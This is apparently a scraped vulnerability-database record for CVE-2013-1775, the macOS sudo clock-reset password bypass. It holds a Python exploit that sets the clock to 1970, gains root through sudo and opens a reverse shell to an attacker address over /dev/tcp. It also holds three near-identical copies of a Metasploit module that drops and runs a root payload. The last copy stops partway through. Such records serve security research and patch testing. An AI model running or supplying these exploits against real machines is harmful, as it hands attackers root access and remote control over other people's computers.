http://www.exploit-db.com/exploits/27944/\r\n#\r\n# Example below:\r\n# trustedsec:Desktop Dave$ python osx_esc.py \r\n# [*] Exploit has been performed. 
You should have a shell on ipaddr: 127.0.0.1 and port 4444\r\n#\r\n# attacker_box:~ Dave$ nc -l 4444\r\n# bash: no job control in this shell\r\n# bash-3.2# \r\n###################################################################################################\r\nimport subprocess\r\n\r\n# IPADDR for REVERSE SHELL - change this to your attacker IP address\r\nipaddr = \"192.168.1.1\"\r\n\r\n# PORT for REVERSE SHELL - change this to your attacker port address\r\nport = \"4444\"\r\n\r\n# drop into a root shell - replace 192.168.1.1 with the reverse listener\r\nproc = subprocess.Popen('bash', shell=False, stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)\r\nproc.stdin.write(\"systemsetup -setusingnetworktime Off -settimezone GMT -setdate 01:01:1970 -settime 00:00;sudo su\\nbash -i >& /dev/tcp/%s/%s 0>&1 &\\n\" % (ipaddr,port))\r\nprint \"\"\"\r\n###############################################################\r\n#\r\n# OSX < 10.8.4 Local Root Priv Escalation Root Reverse Shell\r\n#\r\n# Written by: David Kennedy @ TrustedSec\r\n# Website: https://www.trustedsec.com\r\n# Twitter: @Dave_ReL1K\r\n#\r\n# Reference: http://www.exploit-db.com/exploits/27944/\r\n###############################################################\r\n\"\"\"\r\nprint \"[*] Exploit has been performed. You should have a shell on ipaddr: %s and port %s\" % (ipaddr,port)", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/27965/"}, {"lastseen": "2016-02-03T07:06:11", "description": "Mac OS X Sudo Password Bypass. CVE-2013-1775. 
Local exploit for osx platform", "published": "2013-08-29T00:00:00", "type": "exploitdb", "title": "Mac OS X Sudo Password Bypass", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1775"], "modified": "2013-08-29T00:00:00", "id": "EDB-ID:27944", "href": "https://www.exploit-db.com/exploits/27944/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n#\r\n# http://metasploit.com/\r\n##\r\nrequire 'shellwords'\r\n\r\nclass Metasploit3 < Msf::Exploit::Local\r\n\r\n # ManualRanking because it's going to modify system time\r\n # Even when it will try to restore things, user should use\r\n # it at his own risk\r\n Rank = NormalRanking\r\n\r\n include Msf::Post::Common\r\n include Msf::Post::File\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n SYSTEMSETUP_PATH = \"/usr/sbin/systemsetup\"\r\n SUDOER_GROUP = \"admin\"\r\n VULNERABLE_VERSION_RANGES = [['1.6.0', '1.7.10p6'], ['1.8.0', '1.8.6p6']]\r\n\r\n # saved clock config\r\n attr_accessor :time, :date, :networked, :zone, :network_server\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'Mac OS X Sudo Password Bypass',\r\n 'Description' => %q{\r\n This module gains a session with root permissions on versions of OS X with\r\n sudo binary vulnerable to CVE-2013-1775. 
Tested working on Mac OS 10.7-10.8.4,\r\n and possibly lower versions.\r\n\r\n If your session belongs to a user with Administrative Privileges\r\n (the user is in the sudoers file and is in the \"admin group\"), and the\r\n user has ever run the \"sudo\" command, it is possible to become the super\r\n user by running `sudo -k` and then resetting the system clock to 01-01-1970.\r\n\r\n This module will fail silently if the user is not an admin or if the user has never\r\n run the sudo command.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Todd C. Miller', # Vulnerability discovery\r\n 'joev <jvennix[at]rapid7.com>', # Metasploit module\r\n 'juan vazquez' # testing/fixing module bugs\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-1775' ],\r\n [ 'OSVDB', '90677' ],\r\n [ 'BID', '58203' ],\r\n [ 'URL', 'http://www.sudo.ws/sudo/alerts/epoch_ticket.html' ]\r\n ],\r\n 'Platform' => 'osx',\r\n 'Arch' => [ ARCH_X86, ARCH_X86_64, ARCH_CMD ],\r\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\r\n 'Targets' => [\r\n [ 'Mac OS X x86 (Native Payload)',\r\n {\r\n 'Platform' => 'osx',\r\n 'Arch' => ARCH_X86\r\n }\r\n ],\r\n [ 'Mac OS X x64 (Native Payload)',\r\n {\r\n 'Platform' => 'osx',\r\n 'Arch' => ARCH_X86_64\r\n }\r\n ],\r\n [ 'CMD',\r\n {\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Feb 28 2013'\r\n ))\r\n register_advanced_options([\r\n OptString.new('TMP_FILE',\r\n [true,'For the native targets, specifies the path that '+\r\n 'the executable will be dropped on the client machine.',\r\n '/tmp/.<random>/<random>']\r\n ),\r\n ], self.class)\r\n end\r\n\r\n # ensure target is vulnerable by checking sudo vn and checking\r\n # user is in admin group.\r\n def check\r\n if cmd_exec(\"sudo -V\") =~ /version\\s+([^\\s]*)\\s*$/\r\n sudo_vn = $1\r\n sudo_vn_parts = sudo_vn.split(/[\\.p]/).map(&:to_i)\r\n # check vn between 1.6.0 through 1.7.10p6\r\n # and 1.8.0 through 1.8.6p6\r\n if not 
vn_bt(sudo_vn, VULNERABLE_VERSION_RANGES)\r\n print_error \"sudo version #{sudo_vn} not vulnerable.\"\r\n return Exploit::CheckCode::Safe\r\n end\r\n else\r\n print_error \"sudo not detected on the system.\"\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n if not user_in_admin_group?\r\n print_error \"sudo version is vulnerable, but user is not in the admin group (necessary to change the date).\"\r\n Exploit::CheckCode::Safe\r\n end\r\n # one root for you sir\r\n Exploit::CheckCode::Vulnerable\r\n end\r\n\r\n def exploit\r\n if not user_in_admin_group?\r\n fail_with(Exploit::Failure::NotFound, \"User is not in the 'admin' group, bailing.\")\r\n end\r\n # \"remember\" the current system time/date/network/zone\r\n print_good(\"User is an admin, continuing...\")\r\n\r\n # drop the payload (unless CMD)\r\n if using_native_target?\r\n cmd_exec(\"mkdir -p #{File.dirname(drop_path)}\")\r\n write_file(drop_path, generate_payload_exe)\r\n register_files_for_cleanup(drop_path)\r\n cmd_exec(\"chmod +x #{[drop_path].shelljoin}\")\r\n print_status(\"Payload dropped and registered for cleanup\")\r\n end\r\n\r\n print_status(\"Saving system clock config...\")\r\n @time = cmd_exec(\"#{SYSTEMSETUP_PATH} -gettime\").match(/^time: (.*)$/i)[1]\r\n @date = cmd_exec(\"#{SYSTEMSETUP_PATH} -getdate\").match(/^date: (.*)$/i)[1]\r\n @networked = cmd_exec(\"#{SYSTEMSETUP_PATH} -getusingnetworktime\") =~ (/On$/)\r\n @zone = cmd_exec(\"#{SYSTEMSETUP_PATH} -gettimezone\").match(/^time zone: (.*)$/i)[1]\r\n @network_server = if @networked\r\n cmd_exec(\"#{SYSTEMSETUP_PATH} -getnetworktimeserver\").match(/time server: (.*)$/i)[1]\r\n end\r\n\r\n run_sudo_cmd\r\n end\r\n\r\n def cleanup\r\n print_status(\"Resetting system clock to original values\") if @time\r\n cmd_exec(\"#{SYSTEMSETUP_PATH} -settimezone #{[@zone].shelljoin}\") unless @zone.nil?\r\n cmd_exec(\"#{SYSTEMSETUP_PATH} -setdate #{[@date].shelljoin}\") unless @date.nil?\r\n cmd_exec(\"#{SYSTEMSETUP_PATH} -settime 
#{[@time].shelljoin}\") unless @time.nil?\r\n\r\n if @networked\r\n cmd_exec(\"#{SYSTEMSETUP_PATH} -setusingnetworktime On\")\r\n unless @network_server.nil?\r\n cmd_exec(\"#{SYSTEMSETUP_PATH} -setnetworktimeserver #{[@network_server].shelljoin}\")\r\n end\r\n end\r\n\r\n print_good(\"Completed clock reset.\") if @time\r\n end\r\n\r\n private\r\n\r\n def run_sudo_cmd\r\n print_status(\"Resetting user's time stamp file and setting clock to the epoch\")\r\n cmd_exec(\r\n \"sudo -k; \\n\"+\r\n \"#{SYSTEMSETUP_PATH} -setusingnetworktime Off -settimezone GMT\"+\r\n \" -setdate 01:01:1970 -settime 00:00\"\r\n )\r\n\r\n # Run Test\r\n test = rand_text_alpha(4 + rand(4))\r\n sudo_cmd_test = ['sudo', '-S', [\"echo #{test}\"].shelljoin].join(' ')\r\n\r\n print_status(\"Testing that user has sudoed before...\")\r\n output = cmd_exec('echo \"\" | ' + sudo_cmd_test)\r\n\r\n if output =~ /incorrect password attempts\\s*$/i\r\n fail_with(Exploit::Failure::NotFound, \"User has never run sudo, and is therefore not vulnerable. Bailing.\")\r\n elsif output =~ /#{test}/\r\n print_good(\"Test executed succesfully. 
Running payload.\")\r\n else\r\n print_error(\"Unknown fail while testing, trying to execute the payload anyway...\")\r\n end\r\n\r\n # Run Payload\r\n sudo_cmd_raw = if using_native_target?\r\n ['sudo', '-S', [drop_path].shelljoin].join(' ')\r\n elsif using_cmd_target?\r\n ['sudo', '-S', '/bin/sh', '-c', [payload.encoded].shelljoin].join(' ')\r\n end\r\n\r\n ## to prevent the password prompt from destroying session\r\n ## backgrounding the sudo payload in order to keep both sessions usable\r\n sudo_cmd = 'echo \"\" | ' + sudo_cmd_raw + ' & true'\r\n\r\n print_status \"Running command: \"\r\n print_line sudo_cmd\r\n output = cmd_exec(sudo_cmd)\r\n\r\n end\r\n\r\n # helper methods for accessing datastore\r\n def using_native_target?; target.name =~ /native/i; end\r\n def using_cmd_target?; target.name =~ /cmd/i; end\r\n def drop_path\r\n @_drop_path ||= datastore['TMP_FILE'].gsub('<random>') { Rex::Text.rand_text_alpha(10) }\r\n end\r\n\r\n # checks that the user is in OSX's admin group, necessary to change sys clock\r\n def user_in_admin_group?\r\n cmd_exec(\"groups `whoami`\").split(/\\s+/).include?(SUDOER_GROUP)\r\n end\r\n\r\n # helper methods for dealing with sudo's vn num\r\n def parse_vn(vn_str); vn_str.split(/[\\.p]/).map(&:to_i); end\r\n def vn_bt(vn, ranges) # e.g. ('1.7.1', [['1.7.0', '1.7.6p44']])\r\n vn_parts = parse_vn(vn)\r\n ranges.any? do |range|\r\n min_parts = parse_vn(range[0])\r\n max_parts = parse_vn(range[1])\r\n vn_parts.all? do |part|\r\n min = min_parts.shift\r\n max = max_parts.shift\r\n (min.nil? or (not part.nil? and part >= min)) and\r\n (part.nil? or (not max.nil? 
and part <= max))\r\n end\r\n end\r\n end\r\n\r\nend", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/27944/"}], "metasploit": [{"lastseen": "2020-10-12T23:01:51", "description": "This module gains a session with root permissions on versions of OS X with sudo binary vulnerable to CVE-2013-1775. Tested working on Mac OS 10.7-10.8.4, and possibly lower versions. If your session belongs to a user with Administrative Privileges (the user is in the sudoers file and is in the \"admin group\"), and the user has ever run the \"sudo\" command, it is possible to become the super user by running `sudo -k` and then resetting the system clock to 01-01-1970. This module will fail silently if the user is not an admin, if the user has never run the sudo command, or if the admin has locked the Date/Time preferences. Note: If the user has locked the Date/Time preferences, requests to overwrite the system clock will be ignored, and the module will silently fail. 
However, if the \"Require an administrator password to access locked preferences\" setting is not enabled, the Date/Time preferences are often unlocked every time the admin logs in, so you can install persistence and wait for a chance later.\n", "published": "2013-08-26T18:20:43", "type": "metasploit", "title": "Mac OS X Sudo Password Bypass", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1775"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/OSX/LOCAL/SUDO_PASSWORD_BYPASS", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/exe'\nrequire 'shellwords'\n\nclass MetasploitModule < Msf::Exploit::Local\n\n # ManualRanking because it's going to modify system time\n # Even when it will try to restore things, user should use\n # it at his own risk\n Rank = NormalRanking\n\n include Msf::Post::File\n include Msf::Post::OSX::Priv\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n SYSTEMSETUP_PATH = \"/usr/sbin/systemsetup\"\n VULNERABLE_VERSION_RANGES = [['1.6.0', '1.7.10p6'], ['1.8.0', '1.8.6p6']]\n CMD_TIMEOUT = 45\n\n # saved clock config\n attr_accessor :clock_changed, :date, :network_server, :networked, :time, :zone\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Mac OS X Sudo Password Bypass',\n 'Description' => %q{\n This module gains a session with root permissions on versions of OS X with\n sudo binary vulnerable to CVE-2013-1775. 
Tested working on Mac OS 10.7-10.8.4,\n and possibly lower versions.\n\n If your session belongs to a user with Administrative Privileges\n (the user is in the sudoers file and is in the \"admin group\"), and the\n user has ever run the \"sudo\" command, it is possible to become the super\n user by running `sudo -k` and then resetting the system clock to 01-01-1970.\n\n This module will fail silently if the user is not an admin, if the user has never\n run the sudo command, or if the admin has locked the Date/Time preferences.\n\n Note: If the user has locked the Date/Time preferences, requests to overwrite\n the system clock will be ignored, and the module will silently fail. However,\n if the \"Require an administrator password to access locked preferences\" setting\n is not enabled, the Date/Time preferences are often unlocked every time the admin\n logs in, so you can install persistence and wait for a chance later.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Todd C. Miller', # Vulnerability discovery\n 'joev', # Metasploit module\n 'juan vazquez' # testing/fixing module bugs\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1775' ],\n [ 'OSVDB', '90677' ],\n [ 'BID', '58203' ],\n [ 'URL', 'http://www.sudo.ws/sudo/alerts/epoch_ticket.html' ]\n ],\n 'Platform' => 'osx',\n 'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ],\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\n 'Targets' => [\n [ 'Mac OS X x86 (Native Payload)',\n {\n 'Platform' => 'osx',\n 'Arch' => ARCH_X86\n }\n ],\n [ 'Mac OS X x64 (Native Payload)',\n {\n 'Platform' => 'osx',\n 'Arch' => ARCH_X64\n }\n ],\n [ 'CMD',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2013-02-28'\n ))\n register_advanced_options([\n OptString.new('TMP_FILE',\n [true,'For the native targets, specifies the path that '+\n 'the executable will be dropped on the client machine.',\n '/tmp/.<random>/<random>']\n ),\n ])\n end\n\n # ensure target is vulnerable by 
checking sudo vn and checking\n # user is in admin group.\n def check\n if cmd_exec(\"sudo -V\") =~ /version\\s+([^\\s]*)\\s*$/\n sudo_vn = $1\n sudo_vn_parts = sudo_vn.split(/[\\.p]/).map(&:to_i)\n # check vn between 1.6.0 through 1.7.10p6\n # and 1.8.0 through 1.8.6p6\n if not vn_bt(sudo_vn, VULNERABLE_VERSION_RANGES)\n vprint_error \"sudo version #{sudo_vn} not vulnerable.\"\n return CheckCode::Safe\n end\n else\n vprint_error \"sudo not detected on the system.\"\n return CheckCode::Safe\n end\n\n # check that the user is in OSX's admin group, necessary to change sys clock\n unless is_admin?\n vprint_error \"sudo version is vulnerable, but user is not in the admin group (necessary to change the date).\"\n return CheckCode::Safe\n end\n\n # one root for you sir\n CheckCode::Vulnerable\n end\n\n def exploit\n if is_root?\n fail_with Failure::BadConfig, 'Session already has root privileges'\n end\n\n unless is_admin?\n fail_with Failure::NoAccess, \"User is not in the 'admin' group, bailing.\"\n end\n\n if check != CheckCode::Vulnerable\n fail_with Failure::NotVulnerable, 'Target is not vulnerable'\n end\n\n # \"remember\" the current system time/date/network/zone\n print_good(\"User is an admin, continuing...\")\n\n print_status(\"Saving system clock config...\")\n @time = cmd_exec(\"#{SYSTEMSETUP_PATH} -gettime\").match(/^time: (.*)$/i)[1]\n @date = cmd_exec(\"#{SYSTEMSETUP_PATH} -getdate\").match(/^date: (.*)$/i)[1]\n @networked = cmd_exec(\"#{SYSTEMSETUP_PATH} -getusingnetworktime\") =~ (/On$/)\n @zone = cmd_exec(\"#{SYSTEMSETUP_PATH} -gettimezone\").match(/^time zone: (.*)$/i)[1]\n @network_server = if @networked\n cmd_exec(\"#{SYSTEMSETUP_PATH} -getnetworktimeserver\").match(/time server: (.*)$/i)[1]\n end\n\n run_sudo_cmd\n end\n\n def cleanup\n if @clock_changed\n print_status(\"Resetting system clock to original values\") if @time\n cmd_exec(\"#{SYSTEMSETUP_PATH} -settimezone #{[@zone].shelljoin}\") unless @zone.nil?\n cmd_exec(\"#{SYSTEMSETUP_PATH} 
-setdate #{[@date].shelljoin}\") unless @date.nil?\n cmd_exec(\"#{SYSTEMSETUP_PATH} -settime #{[@time].shelljoin}\") unless @time.nil?\n if @networked\n cmd_exec(\"#{SYSTEMSETUP_PATH} -setusingnetworktime On\")\n unless @network_server.nil?\n cmd_exec(\"#{SYSTEMSETUP_PATH} -setnetworktimeserver #{[@network_server].shelljoin}\")\n end\n end\n print_good(\"Completed clock reset.\")\n else\n print_status \"Skipping cleanup since the clock was never changed\"\n end\n\n super\n end\n\n private\n\n def run_sudo_cmd\n print_status(\"Resetting user's time stamp file and setting clock to the epoch\")\n cmd_exec(\n \"sudo -k; \\n\"+\n \"#{SYSTEMSETUP_PATH} -setusingnetworktime Off -settimezone GMT\"+\n \" -setdate 01:01:1970 -settime 00:00\"\n )\n if not cmd_exec(\"#{SYSTEMSETUP_PATH} -getdate\").match(\"1/1/1970\")\n fail_with(Failure::NoAccess, \"Date and time preference pane appears to be locked. By default, this pane is unlocked upon login.\")\n else\n @clock_changed = true\n end\n\n # drop the payload (unless CMD)\n if using_native_target?\n cmd_exec(\"mkdir -p #{File.dirname(drop_path)}\")\n write_file(drop_path, generate_payload_exe)\n register_files_for_cleanup(drop_path)\n cmd_exec(\"chmod +x #{[drop_path].shelljoin}\")\n print_status(\"Payload dropped and registered for cleanup\")\n end\n\n # Run Test\n test = rand_text_alpha(4 + rand(4))\n sudo_cmd_test = ['sudo', '-S', [\"echo #{test}\"].shelljoin].join(' ')\n\n print_status(\"Testing that user has sudoed before...\")\n output = cmd_exec('echo \"\" | ' + sudo_cmd_test)\n\n if output =~ /incorrect password attempts\\s*$/i\n fail_with(Failure::NotFound, \"User has never run sudo, and is therefore not vulnerable. Bailing.\")\n elsif output =~ /#{test}/\n print_good(\"Test executed succesfully. 
Running payload.\")\n else\n print_error(\"Unknown fail while testing, trying to execute the payload anyway...\")\n end\n\n # Run Payload\n sudo_cmd_raw = if using_native_target?\n ['sudo', '-S', [drop_path].shelljoin].join(' ')\n elsif using_cmd_target?\n ['sudo', '-S', '/bin/sh', '-c', [payload.encoded].shelljoin].join(' ')\n end\n\n ## to prevent the password prompt from destroying session\n ## backgrounding the sudo payload in order to keep both sessions usable\n sudo_cmd = 'echo \"\" | ' + sudo_cmd_raw + ' & true'\n\n print_status \"Running command: \"\n print_line sudo_cmd\n output = cmd_exec(sudo_cmd)\n\n end\n\n # default cmd_exec timeout to CMD_TIMEOUT constant\n def cmd_exec(cmd, args=nil, timeout=CMD_TIMEOUT)\n super\n end\n\n # helper methods for accessing datastore\n def using_native_target?\n target.name =~ /native/i\n end\n\n def using_cmd_target?\n target.name =~ /cmd/i\n end\n\n def drop_path\n @_drop_path ||= datastore['TMP_FILE'].gsub('<random>') { Rex::Text.rand_text_alpha(10) }\n end\n\n # helper methods for dealing with sudo's vn num\n def parse_vn(vn_str)\n vn_str.split(/[\\.p]/).map(&:to_i)\n end\n\n def vn_bt(vn, ranges) # e.g. ('1.7.1', [['1.7.0', '1.7.6p44']])\n vn_parts = parse_vn(vn)\n ranges.any? do |range|\n min_parts = parse_vn(range[0])\n max_parts = parse_vn(range[1])\n vn_parts.all? do |part|\n min = min_parts.shift\n max = max_parts.shift\n (min.nil? or (not part.nil? and part >= min)) and\n (part.nil? or (not max.nil? and part <= max))\n end\n end\n end\nend\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/osx/local/sudo_password_bypass.rb"}, {"lastseen": "2021-01-06T05:20:59", "description": "This module gains a session with root permissions on versions of OS X with sudo binary vulnerable to CVE-2013-1775. Tested working on Mac OS 10.7-10.8.4, and possibly lower versions. 
If your session belongs to a user with Administrative Privileges (the user is in the sudoers file and is in the \"admin group\"), and the user has ever run the \"sudo\" command, it is possible to become the super user by running `sudo -k` and then resetting the system clock to 01-01-1970. This module will fail silently if the user is not an admin, if the user has never run the sudo command, or if the admin has locked the Date/Time preferences. Note: If the user has locked the Date/Time preferences, requests to overwrite the system clock will be ignored, and the module will silently fail. However, if the \"Require an administrator password to access locked preferences\" setting is not enabled, the Date/Time preferences are often unlocked every time the admin logs in, so you can install persistence and wait for a chance later.\n", "published": "2013-08-26T19:52:51", "type": "metasploit", "title": "Mac OS X Sudo Password Bypass", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1775"], "modified": "2020-12-07T10:31:45", "id": "MSF:EXPLOIT/OSX/LOCAL/SUDO_PASSWORD_BYPASS/", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'shellwords'\n\nclass MetasploitModule < Msf::Exploit::Local\n\n # ManualRanking because it's going to modify system time\n # Even when it will try to restore things, user should use\n # it at his own risk\n Rank = NormalRanking\n\n include Msf::Post::File\n include Msf::Post::OSX::Priv\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n SYSTEMSETUP_PATH = \"/usr/sbin/systemsetup\"\n VULNERABLE_VERSION_RANGES = [['1.6.0', '1.7.10p6'], ['1.8.0', '1.8.6p6']]\n CMD_TIMEOUT = 45\n\n # saved clock config\n attr_accessor :clock_changed, :date, :network_server, :networked, :time, :zone\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Mac OS X Sudo Password Bypass',\n 'Description' => %q{\n This 
module gains a session with root permissions on versions of OS X with\n sudo binary vulnerable to CVE-2013-1775. Tested working on Mac OS 10.7-10.8.4,\n and possibly lower versions.\n\n If your session belongs to a user with Administrative Privileges\n (the user is in the sudoers file and is in the \"admin group\"), and the\n user has ever run the \"sudo\" command, it is possible to become the super\n user by running `sudo -k` and then resetting the system clock to 01-01-1970.\n\n This module will fail silently if the user is not an admin, if the user has never\n run the sudo command, or if the admin has locked the Date/Time preferences.\n\n Note: If the user has locked the Date/Time preferences, requests to overwrite\n the system clock will be ignored, and the module will silently fail. However,\n if the \"Require an administrator password to access locked preferences\" setting\n is not enabled, the Date/Time preferences are often unlocked every time the admin\n logs in, so you can install persistence and wait for a chance later.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Todd C. 
Miller', # Vulnerability discovery\n 'joev', # Metasploit module\n 'juan vazquez' # testing/fixing module bugs\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1775' ],\n [ 'OSVDB', '90677' ],\n [ 'BID', '58203' ],\n [ 'URL', 'http://www.sudo.ws/sudo/alerts/epoch_ticket.html' ]\n ],\n 'Platform' => 'osx',\n 'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ],\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\n 'Targets' => [\n [ 'Mac OS X x86 (Native Payload)',\n {\n 'Platform' => 'osx',\n 'Arch' => ARCH_X86\n }\n ],\n [ 'Mac OS X x64 (Native Payload)',\n {\n 'Platform' => 'osx',\n 'Arch' => ARCH_X64\n }\n ],\n [ 'CMD',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2013-02-28'\n ))\n register_advanced_options([\n OptString.new('TMP_FILE',\n [true,'For the native targets, specifies the path that '+\n 'the executable will be dropped on the client machine.',\n '/tmp/.<random>/<random>']\n ),\n ])\n end\n\n # ensure target is vulnerable by checking sudo vn and checking\n # user is in admin group.\n def check\n if cmd_exec(\"sudo -V\") =~ /version\\s+([^\\s]*)\\s*$/\n sudo_vn = $1\n sudo_vn_parts = sudo_vn.split(/[\\.p]/).map(&:to_i)\n # check vn between 1.6.0 through 1.7.10p6\n # and 1.8.0 through 1.8.6p6\n if not vn_bt(sudo_vn, VULNERABLE_VERSION_RANGES)\n vprint_error \"sudo version #{sudo_vn} not vulnerable.\"\n return CheckCode::Safe\n end\n else\n vprint_error \"sudo not detected on the system.\"\n return CheckCode::Safe\n end\n\n # check that the user is in OSX's admin group, necessary to change sys clock\n unless is_admin?\n vprint_error \"sudo version is vulnerable, but user is not in the admin group (necessary to change the date).\"\n return CheckCode::Safe\n end\n\n # one root for you sir\n CheckCode::Vulnerable\n end\n\n def exploit\n if is_root?\n fail_with Failure::BadConfig, 'Session already has root privileges'\n end\n\n unless is_admin?\n fail_with Failure::NoAccess, \"User is not in the 'admin' group, 
bailing.\"\n end\n\n if check != CheckCode::Vulnerable\n fail_with Failure::NotVulnerable, 'Target is not vulnerable'\n end\n\n # \"remember\" the current system time/date/network/zone\n print_good(\"User is an admin, continuing...\")\n\n print_status(\"Saving system clock config...\")\n @time = cmd_exec(\"#{SYSTEMSETUP_PATH} -gettime\").match(/^time: (.*)$/i)[1]\n @date = cmd_exec(\"#{SYSTEMSETUP_PATH} -getdate\").match(/^date: (.*)$/i)[1]\n @networked = cmd_exec(\"#{SYSTEMSETUP_PATH} -getusingnetworktime\") =~ (/On$/)\n @zone = cmd_exec(\"#{SYSTEMSETUP_PATH} -gettimezone\").match(/^time zone: (.*)$/i)[1]\n @network_server = if @networked\n cmd_exec(\"#{SYSTEMSETUP_PATH} -getnetworktimeserver\").match(/time server: (.*)$/i)[1]\n end\n\n run_sudo_cmd\n end\n\n def cleanup\n if @clock_changed\n print_status(\"Resetting system clock to original values\") if @time\n cmd_exec(\"#{SYSTEMSETUP_PATH} -settimezone #{[@zone].shelljoin}\") unless @zone.nil?\n cmd_exec(\"#{SYSTEMSETUP_PATH} -setdate #{[@date].shelljoin}\") unless @date.nil?\n cmd_exec(\"#{SYSTEMSETUP_PATH} -settime #{[@time].shelljoin}\") unless @time.nil?\n if @networked\n cmd_exec(\"#{SYSTEMSETUP_PATH} -setusingnetworktime On\")\n unless @network_server.nil?\n cmd_exec(\"#{SYSTEMSETUP_PATH} -setnetworktimeserver #{[@network_server].shelljoin}\")\n end\n end\n print_good(\"Completed clock reset.\")\n else\n print_status \"Skipping cleanup since the clock was never changed\"\n end\n\n super\n end\n\n private\n\n def run_sudo_cmd\n print_status(\"Resetting user's time stamp file and setting clock to the epoch\")\n cmd_exec(\n \"sudo -k; \\n\"+\n \"#{SYSTEMSETUP_PATH} -setusingnetworktime Off -settimezone GMT\"+\n \" -setdate 01:01:1970 -settime 00:00\"\n )\n if not cmd_exec(\"#{SYSTEMSETUP_PATH} -getdate\").match(\"1/1/1970\")\n fail_with(Failure::NoAccess, \"Date and time preference pane appears to be locked. 
By default, this pane is unlocked upon login.\")\n else\n @clock_changed = true\n end\n\n # drop the payload (unless CMD)\n if using_native_target?\n cmd_exec(\"mkdir -p #{File.dirname(drop_path)}\")\n write_file(drop_path, generate_payload_exe)\n register_files_for_cleanup(drop_path)\n cmd_exec(\"chmod +x #{[drop_path].shelljoin}\")\n print_status(\"Payload dropped and registered for cleanup\")\n end\n\n # Run Test\n test = rand_text_alpha(4 + rand(4))\n sudo_cmd_test = ['sudo', '-S', [\"echo #{test}\"].shelljoin].join(' ')\n\n print_status(\"Testing that user has sudoed before...\")\n output = cmd_exec('echo \"\" | ' + sudo_cmd_test)\n\n if output =~ /incorrect password attempts\\s*$/i\n fail_with(Failure::NotFound, \"User has never run sudo, and is therefore not vulnerable. Bailing.\")\n elsif output =~ /#{test}/\n print_good(\"Test executed succesfully. Running payload.\")\n else\n print_error(\"Unknown fail while testing, trying to execute the payload anyway...\")\n end\n\n # Run Payload\n sudo_cmd_raw = if using_native_target?\n ['sudo', '-S', [drop_path].shelljoin].join(' ')\n elsif using_cmd_target?\n ['sudo', '-S', '/bin/sh', '-c', [payload.encoded].shelljoin].join(' ')\n end\n\n ## to prevent the password prompt from destroying session\n ## backgrounding the sudo payload in order to keep both sessions usable\n sudo_cmd = 'echo \"\" | ' + sudo_cmd_raw + ' & true'\n\n print_status \"Running command: \"\n print_line sudo_cmd\n output = cmd_exec(sudo_cmd)\n\n end\n\n # default cmd_exec timeout to CMD_TIMEOUT constant\n def cmd_exec(cmd, args=nil, timeout=CMD_TIMEOUT)\n super\n end\n\n # helper methods for accessing datastore\n def using_native_target?\n target.name =~ /native/i\n end\n\n def using_cmd_target?\n target.name =~ /cmd/i\n end\n\n def drop_path\n @_drop_path ||= datastore['TMP_FILE'].gsub('<random>') { Rex::Text.rand_text_alpha(10) }\n end\n\n # helper methods for dealing with sudo's vn num\n def parse_vn(vn_str)\n 
